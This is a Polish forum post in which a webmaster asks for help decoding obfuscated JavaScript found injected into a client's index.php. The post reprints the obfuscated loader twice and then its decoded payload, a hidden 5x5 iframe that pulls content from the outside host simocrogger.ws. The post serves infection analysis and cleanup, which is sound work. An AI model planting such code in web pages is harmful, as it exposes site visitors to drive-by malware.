na jednej ze stron klienta w pliku index.php znalazłem taki oto kod JS
Kod
<script language='JavaScript'>
function nbsp()
{
var t,o,l,i,j;
var s='';
s += '060047116101120116097116101097062060047116101120116097114101097062';
s += '0600730700820650770690321151140990610341041161161120580470471151051091110991
14111103103101114046119';
s = s + '1150471021080971151040471051101001011200461121041120340321191051001161040610
53032104101105103104116';
s = s + '0610530321151161211081010610341001051151121080971210581101111101010340620600
47073070082065077069062';
s = s + '032';
t = '';
l=s.length;
i=0;
while(i<(l-1))
{
for(j=0;j<3;j++)
{
t+=s.charAt(i);
i++;
}
if((t-unescape(0xBF))>unescape(0x00))
t-=-(unescape(0x08)+unescape(0x30));
document.write(String.fromCharCode(t));
t='';
}
}
nbsp();
</script>
function nbsp()
{
var t,o,l,i,j;
var s='';
s += '060047116101120116097116101097062060047116101120116097114101097062';
s += '0600730700820650770690321151140990610341041161161120580470471151051091110991
14111103103101114046119';
s = s + '1150471021080971151040471051101001011200461121041120340321191051001161040610
53032104101105103104116';
s = s + '0610530321151161211081010610341001051151121080971210581101111101010340620600
47073070082065077069062';
s = s + '032';
t = '';
l=s.length;
i=0;
while(i<(l-1))
{
for(j=0;j<3;j++)
{
t+=s.charAt(i);
i++;
}
if((t-unescape(0xBF))>unescape(0x00))
t-=-(unescape(0x08)+unescape(0x30));
document.write(String.fromCharCode(t));
t='';
}
}
nbsp();
</script>
Ten kod podejrzewam jakieś niecne plany (badware). Efektem tego jest informacja w google, że strona może zawierać złośliwe oprogramowanie.
Próbowałem zobaczyć co ten kod generuje i jedyne co udało mnie się znaleźć to:
Kod
<㋜꼕쀀
i że próbuje się łączyć z tym adresem http://simocrogger.ws
Ma ktoś jakieś pomysły jak to ugryźć (zmusić do pokazania kodu)?
edycja:
mam już kod
Kod
%3C/textatea%3E%3C/textarea%3E%3CIFRAME%20src%3D%22http%3A//simocrogger.ws/flash/index.php%22%20width%3D5%20height%3D5%20style%3D%22display%3Anone%22%3E%3C/IFRAME%3E%20